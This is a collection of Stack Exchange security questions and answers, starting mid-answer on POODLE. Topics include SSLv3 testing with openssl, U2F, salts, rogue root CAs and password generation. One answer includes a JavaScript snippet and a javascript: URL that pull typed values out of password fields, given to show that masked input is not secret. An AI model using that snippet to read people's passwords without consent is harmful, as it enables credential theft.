That value is then XORed with the previous encrypted block. If the result ends with a byte of value 7 (that works with probability 1/256), then the padding removal step will remove the last 8 bytes, and end up with the intact cleartext and MAC, and the server will be content. Otherwise, either the last byte will not be in the 0..7 range, and the server will complain, or the last byte will be between 0 and 6, and the server will remove the wrong number of bytes, and the MAC will not match, and the server will complain. In other words, the attacker can observe the server's reaction to know whether the CBC decryption result found a 7, or something else. When a 7 is obtained, the last cookie byte is immediately revealed. When the last cookie byte is obtained, the process is executed again with the previous byte, and so on. The core point is that SSL 3.0 is defined as ignoring the padding bytes (except the last). These bytes are not covered by the MAC and don't have any defined value. TLS 1.0 is not vulnerable because in TLS 1.0, the protocol specifies that all padding bytes must have the same value, and libraries implementing TLS verify that these bytes have the expected values. Thus, our attacker cannot get lucky with probability 1/256 (2 -8 ), but with probability 1/18446744073709551616 (2 -64 ), which is substantially worse. I use [product] . Am I affected? Is [product] vulnerable to the Poodle attack ? The attack scenario requires the attacker to be able to inject data of their own, and to intercept the encrypted bytes. The only plausible context where such a thing happens is a Web browser, as explained above. In that case, Poodle is, like BEAST and CRIME, an attack on the client , not on the server. If [product] is a Web browser, then you may be affected. But that also depends on the server. The protocol version used is a negotiation between client and server; SSL 3.0 will happen only if the server agrees. Thus, you might consider that your server is "vulnerable" if it allows SSL 3.0 to be used (this is technically incorrect, since the attack is client-side in a Web context, but I expect SSL-security-meters to work that way). Conditions for the vulnerability to occur: SSL 3.0 supported, and selection of a CBC-based cipher suite (RC4 encryption has no padding, thus is not vulnerable to that specific attack -- but RC4 has other issues, of course). Workarounds: Disable SSL 3.0 support in the client. Disable SSL 3.0 support in the server. Disable support for CBC-based cipher suites when using SSL 3.0 (in either client or server). Implement that new SSL/TLS extension to detect when some active attacker is breaking connections to force your client and server to use SSL 3.0, even though both know TLS 1.0 or better. Both client and server must implement it. Any of these four solutions avoids the vulnerability. What do I need to do to secure my [product] with respect to this vulnerability? Same as always. Your vendor publishes security fixes; install them . Install the patches. All the patches. Do that. For Poodle and for all other vulnerabilities. You cannot afford not to install them, and that is not new . You should already be doing that. If you do not install the patches then Níðhöggr will devour your spleen. How do I detect Poodle attacks on my network? You don't ! Since the most probable attack setup involves the attacker luring the victim on their network, not yours. Although, on the server side, you may want to react on an inordinate amount of requests that fail on a decryption error. 
Not all server software will log events for such cases, but this should be within the possibilities of any decent IDS system. Are there any known Poodle attacks? Not to my knowledge. In fact, when you control all the external I/O of the victim, it is still considerably easier to simply lure the poor sod on a fake copy of their bank site. Cryptographic attacks are neat, but they involve more effort than exploiting the bottomless well of user's gullibility. | {
"source": [
"https://security.stackexchange.com/questions/70719",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/2264/"
]
} |
70,733 | In order to mitigate the "Poodle" vulnerability , I'd like to disable SSLv3 support in my (in this case, TLS, rather than HTTPS) server. How can I use openssl s_client to verify that I've done this? | OpenSSL s_client To check whether you have disabled SSLv3 support, run the following: openssl s_client -connect example.com:443 -ssl3 which should produce something like 3073927320:error:14094410:SSL routines:SSL3_READ_BYTES:sslv3 alert handshake failure:s3_pkt.c:1258:SSL alert number 40
3073927320:error:1409E0E5:SSL routines:SSL3_WRITE_BYTES:ssl handshake failure:s3_pkt.c:596: meaning SSLv3 is disabled on the server. Otherwise, the connection will be established successfully. Nmap Alternatively, you can use nmap to scan the server for supported versions: # nmap --script ssl-enum-ciphers example.com
Starting Nmap 6.47 ( http://nmap.org ) at 2014-10-15 03:19 PDT
Nmap scan report for example.com (203.0.113.100)
Host is up (0.090s latency).
rDNS record for 203.0.113.100: edge.example.com
Not shown: 997 filtered ports
PORT STATE SERVICE
80/tcp open http
443/tcp open https
| ssl-enum-ciphers:
| **SSLv3: No supported ciphers found**
| TLSv1.0: | {
"source": [
"https://security.stackexchange.com/questions/70733",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/27877/"
]
} |
70,742 | I'm looking at ways an outsider (i.e. someone without a possible password) of the network could sniff the communication within the network, specifically focusing on WLAN. This is what I understand about wireless network security: When we connect to an open wireless access point (so, with WEP) it is possible to sniff the communication (but we can't decrypt SSL-encrypted connections). To make it impossible for outsiders to sniff network, we could use WPA(2) or the like, but in any case this will require to password-protect the network. This is what I understand about SSL: When we use for example HTTPS (so HTTP with SSL), it isn't possible for attackers to see the data that is being communicated over the connection (unless a malicious certificate has been trusted ). When we connect to a server using HTTPS, we do not need to enter a passphrase. Say I'd like to create an open Wi-Fi hotspot that encrypts the data in such a way that no one can sniff the communication of other users of the hotspot. This is, as far as I know, not possible (is that correct?). But then, why isn't it possible to encrypt the communication with the wireless access point using a technique like SSL? SSL doesn't require a passphrase, but guarantees nobody can sniff the line. Is there something essential about SSL that makes it impossible to use it for such an application? | {
"source": [
"https://security.stackexchange.com/questions/70742",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/-1/"
]
} |
70,756 | I'm seeing a virus in our network with some strange headers. Sometimes they are coming (sourced) from a netscaler VIP, other times they seem to come from an Exchange hub server. How do I determine the origin of this virus? (workstation, etc) I'm thinking that this has to do with special authentication of the receive connector (MX Exchange auth?) that allows acceptance of the message. Received: from EXMB01.company.com ([xxxx:66bb]) by EXHUB02.company.com ([2.2.2.192]) with mapi id 14.03.0195.001; Wed, 15 Oct 2014 09:55:26 -0400
Content-Type: application/ms-tnef; name="winmail.dat"
Content-Transfer-Encoding: binary
From: "Dale Chip" <[email protected]>
Subject: Unpaid invoic
Thread-Topic: Unpaid invoic
Thread-Index: Ac/of6pWLOgzgrBLQM2EB7owtQTxYw==
Date: Wed, 15 Oct 2014 09:55:25 -0400
Message-ID: <[email protected]>
Accept-Language: en-US
Content-Language: en-US
X-MS-Has-Attach: yes
X-MS-Exchange-Organization-SCL: -1
X-MS-TNEF-Correlator: <[email protected]>
MIME-Version: 1.0
X-MS-Exchange-Organization-AuthSource: HUB02.company.com
X-MS-Exchange-Organization-AuthAs: Internal
X-MS-Exchange-Organization-AuthMechanism: 04
X-Originating-IP: [2.2.2.171]
X-Auto-Response-Suppress: DR, RN, NRN, OOF, AutoReply
X-MS-Exchange-Organization-Recipient-P2-Type: Bcc | {
"source": [
"https://security.stackexchange.com/questions/70756",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/396/"
]
} |
70,786 | This app claims to know when recipients opened the emails that were sent to them. Tracking clicked URLs is fairly straightforward. What I don't understand is how a 3rd party can possibly know when I open their email? Does web-based email clients automatically provide reading-proof to all emails? Because I remember Outlook was asking me whether I wanted to actually send proof of reading or not. If so, how do I disable it? | They track opens the same way every other email sending/analytics company does it: by inserting a tracking pixel within the HTML of the email. If your email client blocks image loading by default, then you won't be tracked. If you load the images, or your client automatically downloads the images (iPhone email client) then you're being tracked. You can see more information about how this works precisely here: http://en.wikipedia.org/wiki/Web_bug | {
"source": [
"https://security.stackexchange.com/questions/70786",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/58740/"
]
} |
70,832 | While disabling SSLv3 from our ssl.conf files to overcome the Poodle vulnerability, I also disabled the SSLv3 ciphers using !SSLv3 . With the ciphers disabled, we were not able to access the website through Firefox and IE. The following was the error message from Firefox: An error occurred during a connection to xxxx.example.com.
Cannot communicate securely with peer: no common encryption algorithm(s).
(Error code: ssl_error_no_cypher_overlap) So we went back and enabled the SSLv3 ciphersuite and it all started working fine. Right now, the SSLv3 protocol is disabled, but the SSLv3 ciphers are enabled. Am I assuming correctly that we got the error with one of the browsers because TLS ciphers were not available in the browser? Is it possible that the protocol used is TLSv3, but the ciphers are of SSLv3? SSLProtocol all -SSLv2 -SSLv3
#SSLProtocol -all +SSLv3
# SSL Cipher Suite:
# List the ciphers that the client is permitted to negotiate.
# See the mod_ssl documentation for a complete list.
SSLCipherSuite ALL:!ADH:!EXPORT:!SSLv2:RC4+RSA:+HIGH:!MEDIUM:!LOW We can upgrade the browsers at our office, but can't do that on our customer's machines. Is having SSLv3 protocol disabled, but with the ciphers enabled a recommended setup? In other words, are we okay with connecting through TLS with SSLv3 ciphers? | I presume from your ssl.conf setting that you are using the mod_ssl module from Apache web server. This module relies on OpenSSL to provide the cryptography engine. From the documentation on OpenSSL , it states: Protocol version: SSLv2, SSLv3, TLSv1.2. The TLSv1.0 ciphers are
flagged with SSLv3 . No new ciphers were added by TLSv1.1 You can confirm the above by running the following command: $ openssl ciphers -v 'TLSv1' | sort
ADH-AES128-SHA SSLv3 Kx=DH Au=None Enc=AES(128) Mac=SHA1
ADH-AES256-SHA SSLv3 Kx=DH Au=None Enc=AES(256) Mac=SHA1
ADH-CAMELLIA128-SHA SSLv3 Kx=DH Au=None Enc=Camellia(128) Mac=SHA1
ADH-CAMELLIA256-SHA SSLv3 Kx=DH Au=None Enc=Camellia(256) Mac=SHA1
... This means that if your configuration file excludes ciphersuite SSLv3, you are effectively removing support for TLSv1.0 too! That leaves you with ciphersuite TLSv1.2 only since support for SSLv2 has also been removed: $ openssl ciphers -v 'ALL:!ADH:!EXPORT:!SSLv2:RC4+RSA:+HIGH:!MEDIUM:!LOW:!SSLv3' | sort
AES128-GCM-SHA256 TLSv1.2 Kx=RSA Au=RSA Enc=AESGCM(128) Mac=AEAD
AES128-SHA256 TLSv1.2 Kx=RSA Au=RSA Enc=AES(128) Mac=SHA256
AES256-GCM-SHA384 TLSv1.2 Kx=RSA Au=RSA Enc=AESGCM(256) Mac=AEAD
AES256-SHA256 TLSv1.2 Kx=RSA Au=RSA Enc=AES(256) Mac=SHA256
... From the above, it is not hard to see why you should NOT remove SSLv3 from the ciphersuite. Disabling SSLv3 protocol is more than sufficient to protect your clients from POODLE vulnerability. The error message you are experiencing is likely because you are using older browsers such as Firefox < 27.0 or Internet Explorer < 11.0 as these versions do not support TLSv1.2 by default. | {
"source": [
"https://security.stackexchange.com/questions/70832",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/58761/"
]
} |
70,846 | What is the easiest way for two people – neither of whom are computer specialists and cannot meet in person – to send a password for an encrypted file that is attached to an email? The two simplest methods are these: telephone the other person and read the password over the phone; or write in the email questions that the NSA and other hackers couldn’t possible answer. The answers or parts thereof when compiled can then be the password or hashed to provide a password. Asking non-technically minded people to install full PGP to send a password is not realistic. Is there a simple piece of JavaScript out there that can do a Diffie-Hellman, so the resulting shared key can become the password? | I too have tried to come up with a good solution for this. But I found https://onetimesecret.com/ which works great. Basically you create a link containing a password and you send this link to the intended recipient. As soon as the receiver clicks on the link, the link expires and the password is deleted. So the receiver only has one time to copy the password. A one-time secret. | {
"source": [
"https://security.stackexchange.com/questions/70846",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/57283/"
]
} |
70,866 | Using Ctrl + ← / → , it's a common behavior across different operating systems to jump from word to word (or from blank to blank) in text input fields. Now I've discovered that this also applies on password fields in Internet Explorer 8 and 11 (I haven't tried it on other versions yet): the actual text is masked with bullet points, nevertheless I'm able to find blanks using the mentioned keyboard combination. At least in Chrome 38, the combination only jumps between the beginning and the end of the whole text. Why isn't this fixed in Internet Explorer? Can this be considered as a security risk? It's only relevant if the password is stored; I guess, this opens more serious attack vectors using external tools, like reading the password from the password store, or using unmasking tools. Still, doing the word jumping, it's possible to get a quick idea of the password using Internet Explorer's built-in "features" Is it possible to change the word delimiter (a whitespace?) at runtime? So could I change it to 'a', and jump to every 'a' using the arrow keys? As mentioned in the comments, it's also possible to jump to special characters like $ , although here the cursor would stop both before and after the character. Is the exact "jumping algorithm" documented anywhere? Are there any other problems with the described behavior of Internet Explorer? | No that is not a security risk. Having stored passwords in a browser is a security risk. Letting an attacker access your computer between when you've typed in the password and before it is submitted is a security risk (and even after you've submitted it, you need to worry about theft of valid session cookies). Being able to jump to blanks/special characters in a typed in password is not a risk. After a password has been typed in the password field, its in the browsers DOM and only takes the least bit of effort to extract the full value out from it. E.g., if you go to the developer's javascript console (e.g., in chrome/linux type Ctrl-Shift-J) and type in (you can skip the comment lines that begin with // ): var inputs = document.getElementsByTagName('input');
// find all <input> elements in the page
for ( var i = 0; i < inputs.length; i++) {
// loop through all <input> elements
if (inputs[i].getAttribute('type') === 'password') {
// find input elements with attribute type="password"
console.log(inputs[i].value);
// print the values of these password elements to the screen.
}
} It will print to the screen whatever text is typed into any password fields. (This code is equivalent to the jQuery $('input[type=password]').val() , which will work if the webpage has loaded jQuery). You could just type the word javascript: in the location bar and then paste var inputs=document.getElementsByTagName('input'); for( var i=0; i < inputs.length; i++ ) { if (inputs[i].getAttribute('type') === 'password') alert(inputs[i].value) } into the location bar and whatever text is in any password field will be alerted to you. (Note: most browsers will remove the javascript: part if you try to paste the full URL, so you will have to type it.) javascript:var inputs=document.getElementsByTagName('input'); for( var i=0; i < inputs.length; i++ ) { if (inputs[i].getAttribute('type') === 'password') alert(inputs[i].value) } | {
"source": [
"https://security.stackexchange.com/questions/70866",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/44774/"
]
} |
71,171 | There are now tons of Certification Authorities (CAs) that are trusted by default in major OS's, many of which are unrecognizable without online lookup or reference. While there have been attempts by the NSA and others to "hack" or otherwise exploit root certicate authorities; is there anything preventing the NSA from becoming a Root CA itself? It certainly has the resources and expertise, and could "suggest" to major OS vendors to add its Root CA to the default trust store list (which is large enough that it may not be noticed by anyone..?) If it is feasible, what would the implications be? Could they essentially Man-in-the-Middle attack most HTTPS connections without a warning? (Perhaps not Dragnet-type interception, but close?) Or create a fake commercial root CA as obviously people would be suspicious if it had NSA plastered all over it? | It is already done: It is the FPKI root CA, under explicit and full control of the US government. Windows already trusts it by default. Before you flip out and begin to delete root CA certificates, burn your computer's motherboard, or drink a gallon of vodka, think about what it means. It means that the US government could technically emit a fake certificate for any SSL site that you are browsing -- but with a certificate chain that would point back to the US government. That is the point of having a "trusted CA" in the client: so that the client may validate a certificate chain. Therefore, such a forged site would hardly be a discreet way to eavesdrop on communications. All it would take would be a single user clicking on the padlock icon, reviewing the certificate chain, notice the FPKI root, and mock Obama on Twitter. Pushing your own root CA in the "trusted store" of your victims is not an adequate way to spy on people without them noticing . Although it is a government agency, the NSA as a whole is usually not that stupid. | {
"source": [
"https://security.stackexchange.com/questions/71171",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/52102/"
]
} |
71,187 | How do you create a readable password using bash with one line? What if i'm looking for 128 bits of entropy? EDIT By readable I mean the 94 printable ascii characters (without space) . It can use less than these characters as long as it has at least 128 bits of entropy. | It depends on what you mean by "readable". If you want to use only hexadecimal characters, you will need 32 of them to reach 128 bits of entropy; this line will work (using only commands from the coreutils package): head -c16 /dev/urandom | md5sum This variant produces passwords with only lowercase letters, from 'a' to 'p' (this is what you will want if you have to "type" the password on a smartphone): head -c16 /dev/urandom | md5sum | tr 0-9 g-p If you want to type one less characters, try this: head -16 /dev/urandom | md5sum (Probability of getting all first 16 random bytes as 0x0A, i.e. the "newline" character, is 2 -128 , hence this line still gets 128 bits of entropy.) Still limiting yourself to commands from coreutils , you can do this: mktemp -u XXXXXXXXXXXXXXXXXXXXXX This one generates a 22-character password, using /dev/urandom as internal source of randomness (I checked in the source code, and a strace call confirms). The characters are letters (uppercase and lowercase) and digits; since 62 22 is greater than 2 128 , the 22 characters are sufficient. Yet another one: od -An -x /dev/urandom | head -1 this displays eight sequences of four hexadecimal digits. Arguably, this split into small sequences may help reading. For a much longer line and a quite distinct kind of password, try this: for i in {1..8} ; do head -$(expr $(head -c7 /dev/urandom | od -An -t dL) % $(wc -l < /usr/share/dict/british-english)) /usr/share/dict/british-english | tail -1 ; done (this one works only on a 64-bit host; will you notice why ?). Apart from coreutils , that version also requires a dictionary file, here the one for British English. | {
"source": [
"https://security.stackexchange.com/questions/71187",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/58920/"
]
} |
71,199 | I'm a bit confused on the differences between Signature Algorithm , Signature Hash Algorithm , and Thumbprint Algorithm that are present in SSL/TLS certificates. Can someone please elaborate? | You are confused because some people (yeah I am looking at you, Microsoft) have been using the terms inconsistently. A signature algorithm is a cryptographic algorithm such that: The signer owns a public/private key pair . The public key is public, the private key is private; even though both keys are mathematically linked together, it is not feasible to recompute the private key from the public key (which is why the public key could safely be made public). On a given input message, the signer can use his private key to compute a signature , which is specific to both the signer's key pair, and the input message. There is a verification algorithm that takes as input the message, the signature and the public key, and answers "true" (they match) or "false" (they don't). The cornerstone of signature security is that it should not be feasible, without knowledge of the private key, to generate pairs message+signature that the verification algorithm will accept. You may encounter some "explanations" that try to say that digital signatures are some kind of encryption; they usually describe it as "you encrypt with the private key". Don't believe it; these explanations are actually wrong, and confusing. For technical reasons, signature algorithms (both for signing and for verifying) often begin with a hash function . A hash function is a completely public algorithm with no key. The point of hash functions is that they can eat up terabytes of data, and produce a "digest" (also called "fingerprint" or even "thumbprint") that has a fixed, small size. Signature algorithms need that, because they work with values in some algebraic structure of a finite size, and thus cannot accommodate huge messages. Therefore, the message is first hashed, and only the hash value is used for generating or verifying a signature. That hash algorithm, when it is used as first step of a signature generation or verification algorithm, will be called "signature hash algorithm". When we say something like "RSA/SHA-256", we mean "RSA signature, with SHA-256 as accompanying hash function". A "thumbprint algorithm" is another name for a hash function. It is often encountered when talking about certificates : the "thumbprint" of a certificate really is the result of a hash function applied to the certificate itself (in Windows systems, the SHA-1 hash function is used). | {
"source": [
"https://security.stackexchange.com/questions/71199",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/2075/"
]
} |
71,273 | On occasion, I hear the terms "key length" and "bit strength" used interchangeably. Are these the same things? Or are they different? | I'd use bit length for the size of something, such as a key. I'd use bit strength as the base 2 logarithm of the cost of an attack. i.e. it costs about 2^n basic operations to break something. A brute force attack against an n bit key that simply tries to guess the key costs 2^(n-1) calls to the encryption function on average, which lead to this convention of expressing the strength of an algorithm in bits. Thus you could understand "n bit strength" as "Breaking this costs approximately as much as breaking a symmetric encryption algorithm with an n bit key." But they differ in other cases. A few examples: An RSA key with a length 2048 bits only has a strength of about 112 bits. A hash with length 128 bits can only have 64 bits of collision resistance. 3DES takes a 168 bit key, but only offers 112 bits of security, due to a meet-in-the-middle attack. | {
"source": [
"https://security.stackexchange.com/questions/71273",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/2075/"
]
} |
71,316 | Google and Yubico just announced the availability of cryptographic security tokens following the FIDO U2F specification. Is this just another 2FA option, or is this significantly better than solutions such as SecureID and TOTP? Specifically: In what way is U2F fundamentally different from OTP? How does U2F affect the feasibility of phishing attacks in comparison to OTP systems? How feasible are non-interactive attacks against U2F (e.g. brute-force, etc)? Can I safely use a single U2F token with multiple independent services? How does U2F stack up against other commercial offerings? Are there better solutions available? | The answers I've gotten have been good, but I wanted to provide a bit more depth, going specifically in to why the system exists at all, which should explain a bit more about what it's good for. Disclaimer: While I now work for Google, I knew nothing about this project at the time this answer was written. Everything reported here was gathered from public sources. This post is my own opinions and observations and commentary, and does not represent the opinions, views, or intentions of Google. Though it's worth pointing out that I've been using this and tinkering with it for quite some time now, and as someone who has dealt a lot with social engineering and account takeovers, I am disproportionately impressed with what has been accomplished here. Why something new was needed Think about this: Google deployed two-factor authentication a long time ago. This is a company that cares deeply about security, and theirs has been top notch. And while they were already using the best technology available, the additional security that U2F delivers above traditional 2-factor is so significant that it was worth the company's time and money to design, develop, deploy, and support a replacement system that they don't even themselves sell. Yes, it's a very socially-conscious move of them to go down this road, but it's not only about the community. Google also did it because they, themselves, need the security that U2F alone provides. A lot of people trust Google with their most precious information, and some in dangerous political environments even trust Google with their lives . Google needs the security to be able to deliver on that trust. It comes down to phishing. Phishing is a big deal. It's extremely common and super effective . For attacks against hardened targets, phishing and similar attacks are really an attacker's best bet, and they know it. And more importantly: Our phishing protection is laughable. We have two-factor auth, but the implementations offer little defense. Common systems such as SecurID, Google Authenticator, email, phone, and SMS loops -- all of these systems offer no protection at all against time-of-use phishing attacks. A one-time-password is still a password, and it can be disclosed to an attacker. And this isn't just theoretical. We've seen these attacks actually carried out. Attackers do, in fact, capture second-factor responses sent to phishing sites and immediately play them on the real login page. This actually happens, right now. So say you're Google. You've deployed the best protections available and you can see that they're not sufficient. What do you do? Nobody else is solving this problem for you; you've got to figure it out. The solution is easy; Adoption is the real issue Creating a second-factor solution that can't be phished is surprisingly simple. All you have to do is involve the browser. 
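To make that concrete, here is a deliberately simplified JavaScript sketch of what "involving the browser" buys you. This is not the real U2F protocol or API -- the origin string, key storage and signing details below are made up for illustration -- but it shows the core idea: the key is looked up by the origin the browser reports, so a look-alike phishing domain simply has no key to sign with.
// Toy illustration only -- origin-bound challenge-response, not the actual U2F protocol.
const crypto = require('crypto');
// "Registration": create a key pair and remember which origin it was registered for.
const { privateKey } = crypto.generateKeyPairSync('ec', { namedCurve: 'prime256v1' });
const storedKeys = { 'https://accounts.example.com': privateKey };
// "Authentication": the browser, not the web page, supplies requestOrigin.
function signChallenge(requestOrigin, challenge) {
  const key = storedKeys[requestOrigin];
  if (!key) throw new Error('no key registered for ' + requestOrigin); // a phishing domain gets nothing
  const signer = crypto.createSign('SHA256');
  signer.update(JSON.stringify({ origin: requestOrigin, challenge: challenge }));
  return signer.sign(key); // the signature covers the origin, so it cannot be replayed elsewhere
}
// signChallenge('https://accounts.example.com', 'nonce-from-server') succeeds;
// signChallenge('https://accounts-example.phish.example', 'nonce') throws instead of leaking anything.
Real U2F does the same thing with the key pair held in tamper-resistant hardware, as described next.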
In the case of U2F, the device creates a public/private key pair for each site and burns the site's identity into the "Key Handle" that the site is supposed to use to request authentication. Then, that site identity is verified by the browser each time before any authentication is attempted. The site identity can even be tied to a specific TLS public key. And since it's a challenge-response protocol, replay is not possible either. And if the server accidentally leaks your "Key Handle" in a database breach, it still doesn't affect your security or reveal your identity. Employing this device effectively eliminates phishing as a possibility , which is a big deal to a security-sensitive organization. Neither the crypto nor its application is new. Both are well-understood and trusted. The technology was never the difficulty, the difficulty is adoption. But Google is one of only a small number of players in a position to overcome the barriers that typically hold solutions like this back. Since Google makes the most popular browser, they can make sure that it's compatible by default. Since they make the most popular mobile OS, they can make sure that it works as well. And since they run the most popular email service, they can make sure that this technology has a relevant use case. More Open than Necessary Of course Google could have leveraged that position to give themselves a competitive advantage in the market, but they didn't. And that's pretty cool. Everyone needs this level of protection , including Yahoo and Microsoft with their competing email offerings. What's cool is that it was designed so that even competitors can safely make it their own. Nothing about the technology is tied to Google -- even the hardware is completely usage-agnostic. The system was designed with the assumption that you wouldn't use it just for Google. A key feature of the protocol is that at no point does the token ever identify itself . In fact the specifications state that this design was chosen to prevent the possibility of creating a "supercookie" that could be used to track you between colluding services. So you can get a single token and safely use it not only on Gmail, but also on any other service that supports U2F. This gives you a lot more reason to put down the money for one. And since Yubico published reference implementations of the server software in PHP, Java, and Python, getting authentication up and running on your own server is safely within the reach of even small shops. | {
"source": [
"https://security.stackexchange.com/questions/71316",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/2264/"
]
} |
71,372 | When users register on my site, I want to store their username and hashed password in my database. When I hash that password, I'm going to salt it using PHP. The issue is, I don't want to store the salt in a database that could be compromised - that defeats the purpose of salting, doesn't it? Instead, I want to have a unique salt per user that is stored on a separate server - say, a cloud platform? Is this safe/the right way to go? | It is not a problem if the attacker learns the salts. Salts are not meant to be secret. What is important for a salt is that it is unique for each hashed password instance (i.e. not only a unique salt per user, but the user's salt must be changed when the user changes his password). If you think of your salt as something that may be shared between passwords, but must not be known to the attacker, then that is not a salt; that's a key . Some people call such keys "pepper" in the case of password hashing. This is a concept quite distinct from salts, and, generally speaking, it adds complexity and increases failure frequency without really improving security. Get the basics right first (i.e. using the right function with proper salts). The normal method is to store the salt along with the hash value. Preferably, you let the password hashing library generate the salt and handle the encoding of the salt and hash value as a single string. So you make sure that you use PHP 5.5 (or newer), and you use password_hash() (and don't use the manual salt setting; the library does the right thing by default, so just let it do it). Among possible password hashing functions , bcrypt is about the best you can have right now, and that's what password_hash() will use. | {
"source": [
"https://security.stackexchange.com/questions/71372",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/59222/"
]
} |
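As a footnote to the answer above on salts and password_hash(): the library stores the salt, the cost factor and the hash together in a single string, so nothing needs to be kept secret or stored separately. The PHP call is the one the answer recommends; purely as an illustration of the same pattern in another language, here is a hedged Python sketch using the third-party bcrypt package (an assumption, not part of the original answer).

import bcrypt  # third-party package: pip install bcrypt

password = b"correct horse battery staple"

# Hashing: gensalt() draws a fresh random salt; salt and cost factor are embedded
# in the returned string, so a single database column holds everything needed.
stored = bcrypt.hashpw(password, bcrypt.gensalt(rounds=12))

# Verification: checkpw() re-reads the salt and cost out of the stored string.
assert bcrypt.checkpw(password, stored)
assert not bcrypt.checkpw(b"wrong guess", stored)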
71,474 | It seems like there are lots of ways to prevent man in the middle attacks. I've read many on here and on the rest of the internet. According to wiki you need a secure channel as well to completely safeguard against it. I have two questions in regards to preventing it in the real world. Does the US government monitor 100% of the lines dug in the US? Obviously (hopefully) data centers are secured but what is there to stop someone from driving out into the desert and physically tapping into a line? In that scenario, is there anything that can be done by two nodes to detect someone started eaves dropping? (Maybe more of a physics question?) Are there any protocols like this already? This question is in the scope of public key cryptography because if you have a secure channel you can just exchange a new key as needed. | Physical surveillance of millions of miles of buried cables would be preposterously expensive. The US government already fails at efficiently preventing illegal immigration across the Mexican/USA boundary, which is one or two orders of magnitude shorter than the total length of cables. Instead, US government does things like everybody else: with encryption (or so we hope, at least). A good encrypted tunnel (e.g. SSL) keeps attackers at bay. Encryption ensures confidentiality. A good tunnel also provides data integrity, in the following sense: alterations are reliably detected. However, if an attacker uses a shovel to get to the cable, he can cut it (it has happened ). To make communications more resilient, one must use redundancy; see this answer (when the attacker wields nuclear weapons, you have to think big in terms of redundancy). | {
"source": [
"https://security.stackexchange.com/questions/71474",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/40048/"
]
} |
71,540 | I run a website at https://fastslots.co . I just discovered that I am getting requests from the URL https://canadaehtees.com/ that I have no affiliation with. When I load canadaehtees.com in my browser I get a warning about an invalid SSL certificate. If I proceed anyway, the site that is displayed looks and behaves exactly like fastslots.co and all requests made there go to my server. However, the URL stays at canadaehtees.com. My site is written in Node.js , and I am not using a proxy. I am redirecting all requests that use HTTP or that start with www to my site using HTTPS. I am not sure what the best thing to do is. Obviously I can just return an error page if I get a request where the URL does not match fastslots.co. Still I am worried about what is going on here. Does anyone know? [ Edit : I am now redirecting all requests to fastslots.co that have an unknown host (such as canadaehtees.com for example). Is this not a good idea?] | I've taken a quick look, and this appears to be completely benign, if somewhat annoying. It's not an attack as Michael suggested in his answer. What has happened is that someone purchased a domain (canadaehtees.com) and pointed the DNS records for that domain at the IP address that currently hosts your website (fastslots.co). Why? It could be a simple mistake, or it could be that they were in possession of that IP address before you were, given that their domain name is slightly older than yours. This is why the site at that domain looks exactly like yours (it is yours!) and you get the invalid certificate error over https (because the certificate is also yours, and so isn't for canadaehtees.com, but for fastslots.co.) What can you do about? Well, redirecting as you've currently configured is one option. I would suggest that you change the redirect from a 302 (temporary) to a 301 (permanent) if this is the solution you want to use long term. Other status codes you could return for unknown hosts would be 404 (not found) or 410 (gone). The more drastic solution, but the one that should permanently fix the issue without any further work on your part would be move your site to another IP. | {
"source": [
"https://security.stackexchange.com/questions/71540",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/59436/"
]
} |
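Regarding the redirect advice in the answer above (301 to the canonical name, or 404/410 for hosts you do not serve): the asker's site is Node.js, so the following is only a language-neutral illustration of the Host-header check, written as a small Python/Flask hook. The handler and host names are assumptions for illustration, not the asker's actual code.

from flask import Flask, abort, redirect, request

app = Flask(__name__)
CANONICAL_HOST = "fastslots.co"

@app.before_request
def enforce_canonical_host():
    host = request.host.split(":")[0].lower()
    if host == CANONICAL_HOST:
        return None                                  # expected host: serve normally
    if host == "www." + CANONICAL_HOST:              # own www name: permanent redirect
        return redirect("https://" + CANONICAL_HOST + request.path, code=301)
    abort(404)                                       # unrelated hosts pointed at this IP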
71,761 | When you have a password stored in a database that has been strongly hashed and salted does it really matter if the underlying user password is weak? If you setup features like limiting login guessing and use captchas to stop automated guessing can you effectively make up for a weak password such as " password "? I guess my question is does using a password like "password" make the salted hash any weaker than using a longer password such as " fish&*n0d1cTionaRYatt@ck "? - Are all salted hashes equally as secure or does it depend upon the password being a good one? | Salted hashes are designed to protect against attackers being able to attack multiple hashes simultaneously or build rainbow tables of pre-calculated hash values. That is all. They do nothing to improve the underlying strength of the password itself, weak or strong. This also means that they're not designed to defend against online attacks, so they have no impact on an attackers ability to manipulate your login form, where the salt is irrelevant, because an attacker isn't computing hashes directly, but entering candidate passwords into a form that may be (as you said) rate limited or protected by a captcha. Weak passwords are weak. Strong passwords are strong. Salts don't affect this equation in any way. | {
"source": [
"https://security.stackexchange.com/questions/71761",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/43059/"
]
} |
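To make the point of the answer above concrete -- a salt only stops precomputation and bulk attacks, it does not make a weak password harder to guess -- here is a tiny self-contained illustration. Plain SHA-256 is used only to show the salting effect; as other answers in this document stress, real password storage should use bcrypt, scrypt or PBKDF2.

import hashlib
import os

def salted_hash(password: str, salt: bytes) -> str:
    return hashlib.sha256(salt + password.encode()).hexdigest()

salt_alice, salt_bob = os.urandom(16), os.urandom(16)

# Two users with the same weak password get completely different records, so
# precomputed tables and shared cracking effort are useless across accounts...
print(salted_hash("password", salt_alice))
print(salted_hash("password", salt_bob))

# ...but the salt is stored next to the hash, so an attacker holding the dump
# still needs only a handful of guesses to hit a weak password like "password".
target = salted_hash("password", salt_alice)
for guess in ["123456", "letmein", "password"]:
    if salted_hash(guess, salt_alice) == target:
        print("guessed it:", guess)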
